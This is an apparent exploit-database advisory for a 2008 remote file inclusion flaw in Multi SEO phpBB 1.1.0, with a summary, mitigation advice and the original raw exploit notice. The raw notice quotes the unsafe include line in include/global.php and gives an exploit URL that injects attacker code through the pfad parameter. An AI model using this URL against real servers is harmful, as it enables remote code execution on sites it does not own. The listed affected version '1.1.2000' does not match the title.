header-logo
Suggest Exploit
vendor:
Multi SEO phpBB
by:
NoGe
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Multi SEO phpBB
Affected Version From: 1.1.2000
Affected Version To: 1.1.2000
Patch Exists: YES
Related CWE: N/A
CPE: a:phpbb-seo:multi_seo_phpbb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability

Multi SEO phpBB version 1.1.0 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains a malicious file which is then included and executed on the vulnerable server. This can lead to the execution of arbitrary code on the vulnerable server.

Mitigation:

The application should be configured to only include files from trusted sources. Input validation should also be used to prevent malicious input from being passed to the application.
Source

Exploit-DB raw data:

==========================================================================


  [o] Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability

       Software : Multi SEO phpBB version 1.1.0

       Vendor   : http://www.phpbb-seo.de/

       Download : http://www.phpbb-seo.de/downloads/multi.html

       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


==========================================================================


  [o] Vulnerable file


       include/global.php


        include_once ($pfad . 'include/config.php');



  [o] Exploit

       http://localhost/[path]/include/global.php?pfad=[evilcode]


==========================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.com/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic olibekas ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
==========================================================================

# milw0rm.com [2008-12-03]